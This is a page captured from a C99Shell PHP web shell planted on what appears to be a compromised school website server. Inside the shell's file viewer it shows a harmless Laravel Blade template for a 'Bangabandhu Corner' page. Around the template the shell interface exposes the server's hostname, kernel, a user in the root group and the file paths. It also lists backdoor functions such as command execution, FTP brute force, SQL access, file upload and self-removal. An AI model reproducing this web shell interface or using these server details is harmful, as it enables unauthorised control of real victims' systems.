!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/frontend/   drwxr-xr-x
Free 26.61 GB of 117.98 GB (22.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     bongo_bondhu_korner_info.blade.php (2.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@section('title')
    {{get_school_name()}}
@endsection


@section('css')

    <style>
.details_right {
    background: #486b4c !important;
}
.bongo_bondhu_korner_details{
    width: 100%
}
.bongo-bondhu-korner-info-img {
    text-align: center;
    width: 85%;
    height: 300px;
    margin: 20px 50px;
}
.bongo-bondhu-sec-wrapper {
    background: #252525;
    border-radius: 10px;
    margin: 20px;
}
.bongo-bondhu-korner-content-details {
    color: #fff;
    padding-left: 36px;
}
.title-sec-for-bongo-bondhu {
    font-size: 30px;
    font-weight: 700;
    padding: 20px;
}
.des-sec-for-bongo-bondhu {
    font-size: 14px;
    font-weight: 500;
    padding: 20px;
}
    </style>

@endsection

@extends('frontend.index')
@section('content')
    @php

        $bannerSliderSection = json_decode(get_settings('banner_slider_section'));
        $head_teacher_message_section = json_decode(get_settings('head_teacher_message_sec'));
        $about_school_sec = json_decode(get_settings('about_school_sec'));

    @endphp


    <div class="leftCon">
        <h2>বঙ্গবন্ধু কর্নার বিস্তারিত</h2>

        @php
            $info = json_decode($bongo_bondhu_korner->user_information);

            if(isset($info->photo) && !empty($info->photo)){
                $user_image = 'uploads/user-images/'.$info->photo;
            }else{
                $user_image = 'uploads/user-images/thumbnail.png';
            }
        @endphp
                <div class="bongo-bondhu-sec-wrapper">

        <div class="bongo_bondhu_korner_details">
            @if (isset($bongo_bondhu_korner) && isset($bongo_bondhu_korner->image))
                <img class="bongo-bondhu-korner-info-img" src="{{asset('assets/uploads/bongo_bondhu_korner/'.$bongo_bondhu_korner->image)}}" alt="" />
            @endif
        </div>
           <div class="bongo-bondhu-korner-content-details">
            <div class="title-sec-for-bongo-bondhu">
                {{isset($bongo_bondhu_korner) && isset($bongo_bondhu_korner->title)?$bongo_bondhu_korner->title:''}}
            </div>
            <div class="des-sec-for-bongo-bondhu">
                {{isset($bongo_bondhu_korner) && isset($bongo_bondhu_korner->description)?$bongo_bondhu_korner->description:''}}
            </div>
           </div>
                </div>
        </div>




@endsection

@section('js')


@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--